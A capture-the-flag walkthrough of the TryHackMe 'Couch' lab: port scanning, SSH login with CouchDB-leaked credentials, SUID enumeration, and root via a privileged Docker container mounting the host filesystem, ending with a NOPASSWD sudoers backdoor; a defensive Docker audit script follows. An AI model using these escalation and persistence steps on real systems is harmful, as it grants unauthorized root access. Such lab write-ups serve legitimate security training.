[THM] : Couch Walkthrough

Suvam Adhikari
3 min read · Feb 11, 2023


Initial Recon:

rustscan -a 10.10.128.127  -- -A -sV -sC -Pn -oN nmapinit.txt
# Nmap 7.92 scan initiated Sat Feb 11 09:53:17 2023 as: nmap -vvv -p 22,5984 -A -sV -sC -Pn -oN nmapinit.txt 10.10.128.127
Nmap scan report for 10.10.128.127
Host is up, received user-set (0.17s latency).
Scanned at 2023-02-11 09:53:17 +0545 for 17s

PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 34:9d:39:09:34:30:4b:3d:a7:1e:df:eb:a3:b0:e5:aa (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDMXnGZUnLWqLZb8VQiVH0z85lV+G4KY5l5kKf1fS7YgSnfZ+k3CRjAZPuGceg5RQEUbOMCm+0u4SDyIEbwwAXGv0ORK4/VEIyJlZmtlqeyASwR8ML4yjdGqinqOUZ3jN/ZIg4veJ02nr86GZP+Nto0TZt7beaIxykMEZHTdo0CctdKLIet7PpvwG4F5Tn9MBoys9pUjfpcnwbf91Tv6i56Gipo07jKgb5vP8Nl1TXPjWB93WNW2vWEQ1J4tiyZlBeLOaNaEbxvNQFnKxjVYiiLCbcofwSdrwZ7/+sIy5BdiNW+k81rBN3OqaQNZ8urFaiXXf/ukRr/hhjY5a6m0MHn
| 256 a4:2e:ef:3a:84:5d:21:1b:b9:d4:26:13:a5:2d:df:19 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNTR07g3p8MfnQVnv8uqj8GGDH6VoSRzwRFflMbEf3WspsYyVipg6vtNQMaq5uNGUXF8ubpsnHeJA+T3RilTLXc=
| 256 e1:6d:4d:fd:c8:00:8e:86:c2:13:2d:c7:ad:85:13:9c (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKLUyz2Tpwc5qPuFxV+HnGBeqLC6NWrmpmGmE0hk7Hlj
5984/tcp open http syn-ack CouchDB httpd 1.6.1 (Erlang OTP/18)
| http-methods:
|_ Supported Methods: GET HEAD
|_http-favicon: Unknown favicon MD5: 2AB2AAE806E8393B70970B2EAACE82E0
|_http-server-header: CouchDB/1.6.1 (Erlang OTP/18)
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Feb 11 09:53:34 2023 -- 1 IP address (1 host up) scanned in 17.99 seconds

We can see CouchDB 1.6.1 running on port 5984. Enumerating directories, I found the /_utils directory, which contained a username and password.

I tried the username and password over SSH and logged in as the user atena. Moving on to privilege escalation on the box, I checked for files with the setuid bit set but didn't get any interesting results.

find / -type f -perm -4000 2> /dev/null

/bin/umount
/bin/su
/bin/mount
/bin/ping
/bin/ping6
/bin/fusermount
/usr/bin/vmware-user-suid-wrapper
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/sudo
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper

We can also see some more ports listening locally, 42602 and 2375, which is probably Docker.

Enumerating the machine, I found a docker command run by atena in the .bash_history file.

docker -H 127.0.0.1:2375 run --rm -it --privileged --net=host -v /:/mnt alpine

We can see that the container bind-mounts the host's root filesystem at /mnt and is started with --privileged. I ran the command and got a root shell in the docker container.

atena@ubuntu:~$ docker -H 127.0.0.1:2375 run --rm -it --privileged --net=host -v /:/mnt alpine
/ # whoami
root

We can now read the root flag. But remember that user atena wasn't allowed to run "sudo -l". Since the host filesystem is mounted at /mnt inside the container, we can add atena to the sudoers file :D

 echo "atena ALL=(ALL) NOPASSWD: ALL" >> /mnt/etc/sudoers

Much better :D .
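As an added defensive check that is not part of the walkthrough: a small audit over `docker inspect`-shaped JSON and a daemon.json that flags the exact combination seen above (API on plain TCP, --privileged, host network, host root bind-mounted read-write). The sample records are constructed and the function names are my own.

```python
import json

# Constructed sample in the shape of `docker inspect <container>` output (only the
# fields this audit reads); it mirrors the walkthrough's --privileged --net=host -v /:/mnt.
SAMPLE_INSPECT = json.dumps([{
    "Name": "/sample_alpine",
    "HostConfig": {"Privileged": True, "NetworkMode": "host", "Binds": ["/:/mnt"]},
    "Mounts": [{"Type": "bind", "Source": "/", "Destination": "/mnt", "RW": True}],
}])
# Constructed /etc/docker/daemon.json that exposes the API over plain TCP.
SAMPLE_DAEMON_JSON = '{"hosts": ["unix:///var/run/docker.sock", "tcp://127.0.0.1:2375"]}'

SENSITIVE_HOST_PATHS = ("/", "/etc", "/var/run/docker.sock")

def sensitive_host_mounts(container):
    """Yield (source, destination, rw) for bind mounts of the host root, /etc or the
    Docker socket; any of these lets the container modify the host."""
    for m in container.get("Mounts", []):
        src = m.get("Source", "")
        if m.get("Type") == "bind" and (src in SENSITIVE_HOST_PATHS or src.startswith("/etc/")):
            yield src, m.get("Destination"), bool(m.get("RW"))

def audit_container(container):
    """Return finding strings for one docker-inspect record."""
    hc = container.get("HostConfig", {})
    findings, writable_root = [], False
    if hc.get("Privileged"):
        findings.append("privileged: all capabilities and raw device access on the host")
    if hc.get("NetworkMode") == "host":
        findings.append("host network namespace is shared with the container")
    for src, dst, rw in sensitive_host_mounts(container):
        findings.append(f"host path {src} bind-mounted {'rw' if rw else 'ro'} at {dst}")
        writable_root = writable_root or (rw and src == "/")
    if hc.get("Privileged") and writable_root:
        findings.append("CRITICAL: privileged container with a writable host root; "
                        "host files such as /etc/sudoers can be rewritten from inside it")
    return findings

def audit_inspect_json(text):
    """Map container name -> findings for a `docker inspect` JSON array."""
    return {c["Name"]: audit_container(c) for c in json.loads(text)}

def audit_daemon_json(text):
    """Flag a daemon.json whose 'hosts' exposes the API over TCP without 'tlsverify'."""
    cfg = json.loads(text)
    tcp = [h for h in cfg.get("hosts", []) if h.startswith("tcp://")]
    return [f"Docker API on plain TCP without tlsverify: {', '.join(tcp)}"] if tcp and not cfg.get("tlsverify") else []
```

On a real host, feed it `docker inspect $(docker ps -q)` and /etc/docker/daemon.json; a plain-TCP listener on 2375 is what let atena reach the daemon without being in the docker group.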
